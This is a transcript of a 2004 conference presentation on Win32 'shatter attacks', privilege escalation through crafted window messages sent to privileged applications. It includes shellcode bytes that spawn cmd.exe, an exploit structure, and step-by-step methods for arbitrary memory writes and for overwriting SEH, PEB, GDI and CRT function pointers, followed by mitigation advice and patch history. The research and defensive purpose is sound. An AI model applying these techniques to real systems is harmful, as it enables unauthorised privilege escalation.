shoot the messenger “win32 shatter attacks” presented by brett moore
DESCRIPTION
Shoot The Messenger “win32 Shatter Attacks” Presented By Brett Moore. Corporate Disclaimer. The information included in this presentation is for research and educational purposes only, and is not to be used outside these areas. Exploit code, where used, is included only for example purposes. - PowerPoint PPT PresentationTRANSCRIPT
Copyright Security-Assessment.com 2004
Security-Assessment.com
Shoot The Messenger
“win32 Shatter Attacks”
Presented By Brett Moore
Copyright Security-Assessment.com 2004
Security-Assessment.com
The information included in this presentation is for research and educational purposes only, and is not to be used outside these areas.
Exploit code, where used, is included only for example purposes.
Security-Assessment.com does not warrant accuracy of information provided, and accepts no liability in any form whatsoever for misuse of this information.
Corporate Disclaimer
Copyright Security-Assessment.com 2004
Security-Assessment.com
Historically Shatter attacks started out as interesting
Although they were essentially a new class of vulnerability, they were considered more a ‘one off’ novelty than a serious threat
MS has had serious security issues in the past The swiss cheese operating system
Highly secure networks protected with standard security measures Access only for permanent employees with long job history Thick client model Non MS workstations with secure builds and secure hardware
(no floppy, CD, USB, etc)
Copyright Security-Assessment.com 2004
Security-Assessment.com
Currently Shatter attacks are starting to widen their scope
But they are still local-local privilege escalation
MS is starting to get serious about patching, Patch management, built in firewalling, XP SP2 etc have been forced by customer pressure
Highly secure networks now Have contractors all over the place, and employees with short
term job history Employee loyalty at all time low due to the loss of the ‘job for life’
mentality Windows machines starting to get everywhere as a client
machine of choice
Copyright Security-Assessment.com 2004
Security-Assessment.com
What’s To Come Shatter attacks are going to expand
This presentation will demonstrate the direction in which these attacks are heading
Windows will be used as a secure platform Highly secure networks will
Have contractors all over the place, and employees with short term job history
Employee loyalty at all time low due to the loss of the ‘job for life’ mentality
And Windows machines all over the place that have ‘Secure Builds’
that are trusted to preserve and control access to the network and data, and to control the user’s privileges and actions
Copyright Security-Assessment.com 2004
Security-Assessment.com
The Bottom Line Shatter attacks affect the core of the OS
It is going to take a long to time to fix this problemIt may never be fixed but may be mitigated on a patch per case basis
It’s not just Microsoft productsAll third party services are potentially exploitableAre the products you buy/sell allowing users to gain elevated privileges
Pay attentionIf people don’t pay attention, then in 12 months time you are going to be running a ‘secure network’ with ‘locked down builds’ and everything you trust to keep you secure will be rotten at the very core of what you trust
Copyright Security-Assessment.com 2004
Security-Assessment.com
Real World Exploitation Privilege escalation
This is the major impact shatter attacks haveLocal, yes, but think citrix and remote desktopExploitable by viruses, worms and other malicious code
Third party applicationsPersonal firewallsAntivirus applications Monitoring and time tracking systems
Any windows user has access > administratorInstall keyloggers, network sniffers and remote access tools Bypass restrictions based on access levelObtain and crack local password files
Copyright Security-Assessment.com 2004
Security-Assessment.com
Consequences Of The Problem Application runs with higher privileges
It may be possible to escalate users privileges
Application disables / hides featuresIt may be possible to obtain unauthorised access
Unauthorised application closingIt may be possible to close applications running to monitor usage
Target app uses GUI text for SQL queriesIt may be possible to exploit classic SQL injection attacks
Target app uses GUI text for file access It may be possible to gain arbitrary file access
Copyright Security-Assessment.com 2004
Security-Assessment.com
Windows Messaging Windows applications wait for input
Input is passed in the form of messages which are managed by the system and directed to the appropriate windows
Window handleEvery window or control has a unique window handle associated with it which is used as the destination address when passing messages
The problemCurrently there is no method to determine the sender of a message so it is possible for any user to send arbitrary messages to applications
Copyright Security-Assessment.com 2004
Security-Assessment.com
Message Routing Methods
Posting to message queuePostMessage() – posts to queue and returns immediately
Sending to window procedureSendMessage() – sends to wndProc and waits for return
Message queuesSingle system message queueOne thread-specific message queue for each GUI threadCreated when the thread makes its first call to a GDI function
Window procedureEvery window is created with a window procedureReceives and processes all messages sent to the windowShared by all windows belonging to the same class
Copyright Security-Assessment.com 2004
Security-Assessment.com
Message Handling
Message Loop GetMessage() TranslateMessage() DispatchMessage()
Window Procedure ActOnMessage()or DefWinowProc()
Message QueueThread
App
Window
{ PostMessage() }
{ SendMessage() }
Copyright Security-Assessment.com 2004
Security-Assessment.com
Message Type By Parameter Type 1 – Used to pass a string to target app
Data is correctly marshaled, resulting in data transfer to the target application
Type 2 – Used to pass a long to target appNo marshalling is required and the data is used directly, resulting in the setting of some value in the target application
Type 3 – Used to overwrite memoryA pointer to a structure is passed which is not correctly marshaled, resulting in the overwriting of memory in the target application
Copyright Security-Assessment.com 2004
Security-Assessment.com
Message Marshalling msdn
The system only does marshalling for system messages (those in the range 0 to WM_USER). To send other messages (those above WM_USER) to another process, you must do custom marshalling
0-0x3FF (0 .. WM_USER-1): System-defined Defined by Windows so the operating system understands how to parse the WPARAM and LPARAM parameters and can marshal the messages between processes
0x400-0xFFFF (WM_USER .. MAX): User-definedSince anybody can create a message in this range, the operating system does not know what the parameters mean and cannot perform automatic marshalling
Copyright Security-Assessment.com 2004
Security-Assessment.com
Marshaled Messages < 0x400 automatically marshaled
winuser.h #define WM_USER 0x0400#define WM_SETTEXT 0x000C
> 0x400 not automatically marshaledcommctrl.h
#define HDM_FIRST 0x1200#define HDM_GETITEMRECT (HDM_FIRST + 7)
richedit.h#define EM_FINDTEXT (WM_USER + 56)
Copyright Security-Assessment.com 2004
Security-Assessment.com
Auto Marshaled Data Marshalling is done on a per message basis
Marshaled messages may be exploitable, dependant on usagePointers to pointers are inherently unsafe
Parameter is used directlySendMessage(hWnd,WM_TIMER,1, (TIMERPROC *))
(TIMERPROC *) is passed to winProc without changing
Parameter is ptr to data SendMessage(hWnd,WM_SETTEXT,0, (LPCTSTR))
Data at (LPCTSTR) is copied to target process mapped heapMessage is processed with an updated (LPCTSTR) Data is copied from target to sender if required
Copyright Security-Assessment.com 2004
Security-Assessment.com
GDI Shared Handle Table
PEB0x7ffdf000
..
0x7ffdf094
..
HEAPGDI Shared Handle Table
Process Mapped Heap
+ 0x60000
typedef struct{ DWORD pKernelInfo;// 2000/XP, inverted in NT WORD ProcessID; WORD _nCount;
WORD nUpper; WORD nType; DWORD pUserInfo;} GDITableEntry;
Holds GDI object handles from all processes 0x4000 GDITableEntry entries
Copyright Security-Assessment.com 2004
Security-Assessment.com
HEAP (mapped)
HEAP (mapped)
Target AppAttack App
0x490000 BASE
..
0x5238c0 DATA
..
0x530000 BASE
..
0x5c38c0 DATA
..
+ 0xA0000
Static Diff+ 0xA0000 =
Process Mapped Heap (R/X)
Copyright Security-Assessment.com 2004
Security-Assessment.com
Shellcode Small
Usually only requires calling system(“cmd”)Can contain null bytes
BYTE exploit[] =
"\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
Exploiting locallyAll relocatable address’s can be assigned at runtime
hMod = LoadLibrary("msvcrt.dll");ProcAddr = (DWORD)GetProcAddress(hMod, "system"); *(long *)&exploit[8] = ProcAddr;
Copyright Security-Assessment.com 2004
Security-Assessment.com
SetWindowTextWUnicode function, will accept NULL bytes but is terminated by wide character NULL
Passing NULL Bytes
BYTE exploit[] =
"\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
BYTE exploit[] =
"\x68\x63\x6d\x00\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1";
BYTE exploit[] =
"\x68\x63\x6d\x64\x00\x00\xb9\xc3\xaf\x01\x78\xff\xd1";
GOOD
GOOD
BAD
Copyright Security-Assessment.com 2004
Security-Assessment.com
00511858 03 03 03 03 03 03 03 0300511860 03 03 03 03 00 00 00 00
00511858 03 03 03 03 03 03 02 00 00511860 03 03 03 03 00 00 00 00
00511858 03 03 03 03 03 00 02 00
00511860 03 03 03 03 00 00 00 00
00511858 01 01 01 01 00 00 02 00
00511860 03 03 03 03 00 00 00 00
00511858 01 01 01 01 00 00 02 0000511860 03 03 03 03 00 00 00 00
Writing NULL Bytes SetWindowTextW
Same address is used if length is <= previous
Using multiple messages,write shellcode backwards
\x01\x01\x01\x01\x00\x00\x02\x00\x03\x03\x03\x03
0x010101010x000200000x03030303
Copyright Security-Assessment.com 2004
Security-Assessment.com
Brute force methodsCan automatically handle errors, No good for ‘one shot’ exploits
Arbitrary byte writingAllows the writing of bytes to a known location
Arbitrary memory readingStatusbar exploit
GDI shared heapChris Paget – Messagebox / Brute force
Process mapped heapSetWindowTextW / ReadProcessMemory
Finding Shellcode Address
Copyright Security-Assessment.com 2004
Security-Assessment.com
SetWindowTextW / ReadProcessMemory Find heap offset
Locate target app mapped heap base
ReadProcessMemory(hProcess,0x7ffdf094,&offset,4,&bread)
TargetProcessMappedHeap = offset + 0x060000
Locate attack app mapped heap base
GdiSharedHandleTable = *(DWORD *)0x7ffdf094
LocalProcessMappedHeap = GdiSharedHandleTable + 0x060000
The static heap offset is the difference between the two
Copyright Security-Assessment.com 2004
Security-Assessment.com
HEAP
SetWindowTextW / ReadProcessMemory
HEAP
Message Handler
Target App
Exploit
Attack App
{Adjusted Address}
{SetWindowTextW}
{ReadProcessMemory}
Find data addressUse SetWindowTextW to inject our shellcodeSearch attack app heap for shellcode with ReadProcessMemoryAdjust with heap offset to obtain shellcode address in target
SHELLCODE
Copyright Security-Assessment.com 2004
Security-Assessment.com
Pass address of shellcode in messagesendmessage(hWND,WM_MSG,1,0xADDRESS)
The following accept callbacks as a parameterWM_TIMER (patched)EM_SETWORDBREAKPROC(EX)LVM_SORTITEMS(EX)
The following accept callbacks in a structure EM_STREAMIN / EM_STREAMOUT
EM_SETHYPHENATEINFOTVM_SORTCHILDRENCB
Callback Attacks
Copyright Security-Assessment.com 2004
Security-Assessment.com
HEAP
Message Handler
Target App
Exploit
Attack App
{SET TEXT}SHELLCODE
{CALLBACK}
Callback Attacks
Copyright Security-Assessment.com 2004
Security-Assessment.com
Easy shatter – Ovidio Mallo EditWordBreakProcEx( char *pchText,LONG cchText,BYTE bCharSet,INT code); ~ LoadLibrary(
LPCTSTR lpLibFileName);
Return to libc SetUnhandledExceptionFilter(
LPTOP_LEVEL_EXCEPTION_FILTER lpFilter);
system(char *command);
Callback Attacks
Copyright Security-Assessment.com 2004
Security-Assessment.com
EM_STREAMIN Exploit
struct _editstream { DWORD dwCookie; DWORD dwError; CALLBACK pfnCallback; }
CALLBACK EditStreamCallback( DWORD dwCookie, LPBYTE pbBuff, LONG cb, LONG *pcb );
~
system( char *command);
Editstream Exploit Structure
Ptr to DATA A8 00 31 00 ..1.
02 02 02 02 ....
Ptr to System BF 8E 01 78 ¿Ž.x
DATA 63 3A 5C 77 c:\w
69 6E 6E 74 innt
5C 73 79 73 \sys
74 65 6D 03 tem3
32 5C 63 6D 2\cm
64 2E 65 78 d.ex
65 00 00 00 e...
Copyright Security-Assessment.com 2004
Security-Assessment.com
Arbitrary Memory Writing Attacks Some messages pass a pointer to a structure to receive size data
By passing the address to overwrite we can write the firstmember of the structure to a controlled location
Paired with a message used to set size dataBy using a complimentary message to set the size, we cancontrol the first member of the structure
This allows the writing of controlled bytes to a controlled location
Copyright Security-Assessment.com 2004
Security-Assessment.com
Message Handler
Target App
Exploit
Attack App{SET SIZE}
{REQUEST SIZE}
Address LEFT TOP
Address+8 RIGHT BOT
Writing Arbitrary Bytes (Listview)
SendMessage(hWnd,LVM_SETCOLUMNWIDTH,0,BYTE)SendMessage(hWnd,HDM_GETITEMRECT,1,ADDRESS)
Copyright Security-Assessment.com 2004
Security-Assessment.com
For Each Byte To Write{
SendMessage(hWnd,SET_SIZE_MSG,0,MAKELPARAM([byte], 0));SendMessage(hWnd,GET_SIZE_MSG,1,[address]);address++;
}
7FFDF100 00 00 00 00 00 00 00 00 ........
7FFDF108 00 00 00 00 00 00 00 00 ........
7FFDF110 00 00 00 00 00 00 00 00 ........
7FFDF118 00 00 00 00 00 00 00 00 ........
7FFDF100 48 00 00 00 00 00 00 00 H.......
7FFDF108 7A 00 00 00 11 00 00 00 z.......
7FFDF110 00 00 00 00 00 00 00 00 ........
7FFDF118 00 00 00 00 00 00 00 00 ........
7FFDF100 48 65 00 00 00 00 00 00 He......
7FFDF108 00 97 00 00 00 11 00 00 .—......
7FFDF110 00 00 00 00 00 00 00 00 ........
7FFDF118 00 00 00 00 00 00 00 00 ........
7FFDF100 48 65 6C 00 00 00 00 00 Hel.....
7FFDF108 00 00 9E 00 00 00 11 00 ..ž.....
7FFDF110 00 00 00 00 00 00 00 00 ........
7FFDF118 00 00 00 00 00 00 00 00 ........
7FFDF100 48 65 6C 6C 6F 20 57 6F Hello Wo
7FFDF108 72 6C 64 00 00 00 00 00 rld.....
7FFDF110 00 00 00 00 32 00 00 00 ....2...
7FFDF118 11 00 00 00 00 00 00 00 ........
Writing Arbitrary Bytes
Copyright Security-Assessment.com 2004
Security-Assessment.com
List viewLVM_SETCOLUMNWIDTH / HDM_GETITEMRECT
Tab viewTCM_SETITEMSIZE / TCM_GETITEMRECT
Progress barPBM_SETRANGE / PBM_GETRANGE
Status barSB_SETPARTS / SB_GETPARTS
Buttons (XP)BCM_SETTEXTMARGIN / BCM_GETTEXTMARGIN
Message Pair Examples
Copyright Security-Assessment.com 2004
Security-Assessment.com
SEH
HEAP
Message Handler
Target App
Exploit
Attack App{SET CODE}
{OVERWRITE}
PEB
SHELLCODE
{EXCEPTION}
Write shellcode to known writeable
Overwrite SEH using byte write
Cause exception
Overwrite SEH
Copyright Security-Assessment.com 2004
Security-Assessment.com
Can not write byte by byte, as pointer is used between writes
Write shellcode to heap
Set address to the third byte
0x00 is written to the fourth
Original
0x7FFDF020 03 91 F8 77
New
0x7FFDF020 03 91 07 00
HEAP 00079103 90 B9 20 F0 .¹ ð
00079107 FD 7F B8 03 ý.¸.
0007910B 91 F8 77 89 ‘øw‰
0007910F 01 89 41 04 .‰A.
00079113 90 68 63 6D .hcm
00079117 64 00 54 B9 d.T¹
0007911B BF 8E 01 78 ¿Ž.x
0007911F FF D1 CC 00 ÿÑÌ.
Overwrite PEB Lock Ptr
Copyright Security-Assessment.com 2004
Security-Assessment.com
HEAP
Message Handler
Target App
Exploit
Attack App
{SET CODE}
{OVERWRITE}
PEB
SHELLCODE
Write shellcode to heap
Overwrite PEB using word write
Point into heap @ 0x00??XXXX
Overwrite PEB Lock Ptr
Copyright Security-Assessment.com 2004
Security-Assessment.com
Can not write byte by byte, as pointer is used between writes
Write shellcode to known location
Write pointer table to heap
Set address to the third byte
0x00 is written to the fourth
HEAP
PEB
SHELLCODE
PTR TO SHELLCODE
Overwrite GDI Dispatch Table Ptr
Copyright Security-Assessment.com 2004
Security-Assessment.com
HEAP
Message Handler
Target App
Exploit
Attack App
{SET CODE}
{OVERWRITE}
PEB
PTR TO SHELLCODE
SHELLCODE
Write shellcode to known writeable
Write ptr table to heap
Overwrite GDI using word write
Point into heap @ 0x00??XXXX
Overwrite GDI Dispatch Table Ptr
Copyright Security-Assessment.com 2004
Security-Assessment.com
Overwriting C Run-Time Terminators crt0dat.c C run-time initialization / termination routines
Terminators called from doexit() Called on normal or abnormal termination
_initterm(_PVFV * pfbegin, _PVFV * pfend) Walk a table of function pointers, calling each entry
Overwrite pointer in table with address of shellcode
Close process using WM_CLOSE message Or by causing an unhandled exception error
Copyright Security-Assessment.com 2004
Security-Assessment.com
7800119B push esi7800119C mov esi,dword ptr [esp+8]780011A0 jmp 780011A5780011A2 add esi,4780011A5 cmp esi,dword ptr [esp+0Ch]780011A9 jae 780011B5780011AB mov eax,dword ptr [esi]780011AD test eax,eax780011AF je 780011A2780011B1 call eax780011B3 jmp 780011A2780011B5 pop esi
Overwriting _initterm Table Entries
780011F7 push 7803A154h780011FC push 7803A14Ch78001201 call 7800119B
exit() doexit()
_initterm
Copyright Security-Assessment.com 2004
Security-Assessment.com
Buffer Overflows Windows messages pass user input
Similar to other user input based security issues, the input should be sanitized before it is used,
LB_DIR / CB_DIR OverflowIn this case, the data was marshaled correctly but the length of the path was not checked before it was used, resulting in a buffer overflow
Text Length Checking’Writing Secure Code’ advises that to avoid buffer overflows you should check the length of the requested text before using any of the following messages; TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING, SB_GETTEXT TVM_GETISEARCHSTRING, TTM_GETTEXT, CB_GETLBTEXT, SB_GETTIPTEXT, LB_GETTEXT
Good advice, but….
Copyright Security-Assessment.com 2004
Security-Assessment.com
It may not prevent exploitationTB_GETBUTTONTEXTA (WM_USER + 45)
LVM_GETISEARCHSTRINGA (LVM_FIRST + 52)
TVM_GETISEARCHSTRINGA (TV_FIRST + 23)
SB_GETTEXTA (WM_USER+2)
SB_GETTIPTEXTA (WM_USER+18)
TTM_GETTEXTA (WM_USER +11)
Race ConditionsThis process of requesting the length, setting up a buffer, and then requesting the text, could also open up the possibility of race conditions.
Text Retrieval Messages
Copyright Security-Assessment.com 2004
Security-Assessment.com
Discovery Tools
Locate Applications Spy ++ - Visual Studio Task Manager
Windows 2000 - can’t close apps running under system
Windows XP - Displays user applications run under
Process Explorer – www.sysinternals.com
Locate Vulnerable Messages Through FuzzingEnumerate through messages, passing ‘fuzzy’ parameters
Copyright Security-Assessment.com 2004
Security-Assessment.com
Undocumented Application Messages
01016C13 test byte ptr [edi+3],201016C17 je 01016C2D
winhlp32 loaded as system
Run fuzzer passing 1
Point EDI to block of 0x11111111 and continue
Copyright Security-Assessment.com 2004
Security-Assessment.com
Next exception
Point ESI to our block of 0x11111111, continue
Final exception
Undocumented Application Messages
EAX = 0006F198 EBX = 00000002ECX = 00001402 EDX = 00000000ESI = 11111111 EDI = 00000000
First-chance exception in winhlp32.exe: 0xC0000005: Access Violation.
01007EA8 push eax01007EA9 call dword ptr [esi+36h]01007EAC inc dword ptr [ebp+8]
01007E3D cmp word ptr [esi+20h],di01007E41 ja 01007E5D
Copyright Security-Assessment.com 2004
Security-Assessment.com
Undocumented Application Messages Complex callback exploit
Send message passing address of pointer 1 block
EDI set to address of pointer 1 block
ESI loaded with address of pointer 2 block
[ESI+36] points to pointer to shellcode
Winhlp32.exe Exploit Structure
Pointer 1 Block of pointers pointing to pointer 2
Pointer 2 Block of pointers pointing to shellcode
Shellcode Code to be executed
Copyright Security-Assessment.com 2004
Security-Assessment.com
Unintentional Functionality Some controls have default message handling LB_DIR message sent to utilman reads directories as SYSTEM user
Copyright Security-Assessment.com 2004
Security-Assessment.com
Unintentional Application Loading
Context sensitive help Winhlp32.exe loaded as system
HtmlHelp() API Viewer loaded as system
Common file dialog Open with cmd.exe
Copyright Security-Assessment.com 2004
Security-Assessment.com
Thick Client Shatter Attacks
ITEMDATA TEXT
1 Admin
2 User
Request password for selected itemdata
Attacker changes selected item
Log in user for selected itemdata
{LB_SETCURSEL}ITEMDATA TEXT
1 Admin
2 User
Copyright Security-Assessment.com 2004
Security-Assessment.com
Future Of Windows GUI Attacks Attacks will move away from messages Attacks will be found that exploit APIS that manipulate window data through other methods.
Cross winstation / desktop attacks There may be loopholes allowing for attacks across these boundaries
As long as there are accessible windows These attacks are not going to be solved overnight They affect more than just the core windows OS Every third party application running under the SYSTEM context may be exploitable
Copyright Security-Assessment.com 2004
Security-Assessment.com
Parenting Problems So far unexploitable Example of a theoretical attack we have so far been unable to exploit in a ‘real world’ situation.
SetParent() API msdn states “An application can use the SetParent function to set the parent window of a pop-up, overlapped, or child window. The new parent window and the child window must belong to the same application.”
Woops, that’s not quite right. In reality, any application can set the parent of any other application created window.
Copyright Security-Assessment.com 2004
Security-Assessment.com
Parenting Problems
The Theory Exploit becomes parent
Target app calls GetParent() to obtain handle to parent window
Target requests data from parent window
Exploit supplies corrupt data leading to exploitation
Copyright Security-Assessment.com 2004
Security-Assessment.com
Windows Properties What are properties Window properties are used to store data associated with a window They can store any type of information and are application specific
The functions GetProp() retrieves the data from a property of the specified hWnd SetProp() sets the data of a property of the specified hWnd
The problem Any application can set any property value of any other window
No ‘core services’ vulnerable We have been unable to exploit any of the default windows services But….
Copyright Security-Assessment.com 2004
Security-Assessment.com
Windows Properties AfxOldWndProc423 MFC subclasses all non-MFC derived windows to handle specific activation issues. While subclassing a non-MFC created window, the old window procedure is stored in the properties of the window.
WindowProc in a property This address is chained through the subclassed window proc and can be overwritten allowing for execution flow control
The First Third Party Application Tested Was Vulnerable
Copyright Security-Assessment.com 2004
Security-Assessment.com
Application Protection Thoughts Message filtering
Too many known and unknown messages to block the dangerous onesOnly allowing the safe messages can be very tricky to implement throughout an application, and how can you be sure they are safe?As we have shown, it is not just message handlers that are vulnerable
Limited privilegeWindows should not be created with higher privileges Beware RevertToSelf() exploitation
Application defined messagesEnsure any messages you define are handled safelyAs with any type of user input, data should be validated first
Copyright Security-Assessment.com 2004
Security-Assessment.com
Application Protection Thoughts Service should talk to GUI
Using RPC, sockets, named pipes, or COM for communication from service to GUI
Disable interactive servicesHKLM\SYSTEM\CurrentControlSet\Control\Windows\NoInteractiveServices
Defaults to zero allowing services with SERVICE_INTERACTIVE_PROCESS to run interactivelyWhen set to a nonzero value, no service started thereafter is allowed to run interactively, regardless of SERVICE_INTERACTIVE_PROCESS
Understanding the threatHopefully this presentation has helped you do just that
Copyright Security-Assessment.com 2004
Security-Assessment.com
2000 - 07 - DilDogWindows Still Image Privilege Elevation
2000 - 08 - Justin E. Forrester and team An Empirical Study of the Robustness of NT Applications Using Random Testing
2002 - 05 - Simeon XenitellisSecurity Vulnerabilities In Event-Driven Systems
2002 - 05 - Chris PagetShatter Attacks - How to break Windows.
2002 - 07 - Simeon XenitellisSecurity Vulnerabilities In Event-Driven Systems (revised)
2002 - 08 - Chris PagetMore on Shatter
2002 - 12 - Microsoft Security Bulletin MS02-071 (WM_TIMER)2003 - 07 - Oliver Lavery
Win32 Message Vulnerabilities Redux2003 - 07 - Microsoft Security Bulletin MS03-025 (LVM_SortItems workaround)2003 - 10 - Brett Moore
Shattering By Example2003 - 10 - Microsoft Security Bulletin MS03-045 (LB_DIR / CB_DIR)2004 - 04 - Microsoft Security Bulletin MS04-011 (Utility Manager Winhlp32 Priv Escalation)2004 - 07 - Microsoft Security Bulletin MS04-019 (Utility Manager Winhlp32 Priv Escalation #2)
Some History